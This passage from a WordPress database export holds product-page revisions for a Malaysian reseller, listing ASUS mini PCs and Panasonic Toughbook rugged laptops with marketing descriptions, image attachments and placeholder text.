src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2018-12-19 17:31:05','2018-12-19 09:31:05','',1442,'https://bintara.com.my/blog/2018/12/19/1442-revision-v1/',0,'revision','',0),(2591,1,'2018-12-19 17:32:13','2018-12-19 09:32:13','<h2>Under Maintenance</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:32:13','2018-12-19 09:32:13','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2593,1,'2018-12-20 09:32:19','2018-12-20 01:32:19','','tb31_win10','','inherit','closed','closed','','tb31_win10','','','2018-12-20 09:32:19','2018-12-20 01:32:19','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg',0,'attachment','image/jpeg',0),(2594,1,'2018-12-20 09:33:31','2018-12-20 01:33:31','','tb_33_hero','','inherit','closed','closed','','tb_33_hero','','','2018-12-20 09:33:31','2018-12-20 01:33:31','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png',0,'attachment','image/png',0),(2595,1,'2018-12-20 09:37:58','2018-12-20 01:37:58','','tb_54_hero','','inherit','closed','closed','','tb_54_hero','','','2018-12-20 09:37:58','2018-12-20 01:37:58','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png',0,'attachment','image/png',0),(2596,1,'2018-12-20 09:41:51','2018-12-20 01:41:51','','20mk2_laptop_right_angle_detached (1)','','inherit','closed','closed','','20mk2_laptop_right_angle_detached-1','','','2018-12-20 09:41:51','2018-12-20 01:41:51','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg',0,'attachment','image/jpeg',0),(2597,1,'2018-12-20 09:43:02','2018-12-20 01:43:02','','toughpad-q2-hero','','inherit','closed','closed','','toughpad-q2-hero','','','2018-12-20 09:43:02','2018-12-20 01:43:02','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png',0,'attachment','image/png',0),(2598,1,'2018-12-20 09:44:27','2018-12-20 01:44:27','<h2>Computer Toughbook</h2>		\n			<h2>TOUGHBOOK 33</h2>		\n			<h2>TOUGHBOOK 31</h2>		\n			<h2>TOUGHBOOK 54</h2>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>Â </p><p>[maxbutton id=\"1\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>Â </p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h2>TOUGHBOOK 20</h2>		\n			<h2>TOUGHPAD FZ-Q2</h2>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>Â </p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>Â </p><p>[maxbutton id=\"1\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 09:44:27','2018-12-20 01:44:27','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2599,1,'2018-12-20 09:49:11','2018-12-20 01:49:11','<h2>Computer Toughbook</h2>		\n			<h2>TOUGHBOOK 33</h2>		\n			<h2>TOUGHBOOK 31</h2>		\n			<h2>TOUGHBOOK 54</h2>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>Â </p><p>[maxbutton id=\"1\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>Â </p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>Â </p><p>Â </p><p>Â </p><p>Â </p><p>[maxbutton id=\"1\" ]</p>		\n			<h2>TOUGHBOOK 20</h2>		\n			<h2>TOUGHPAD FZ-Q2</h2>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>Â </p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>Â </p><p>[maxbutton id=\"1\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 09:49:11','2018-12-20 01:49:11','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2605,1,'2018-12-20 10:08:13','2018-12-20 02:08:13','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n			<h4>TOUGHBOOK 31</h4>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"1\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n			<h4>TOUGHBOOK N1</h4>		\n			<h3>TOUGHPAD FZ-X1</h3>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking 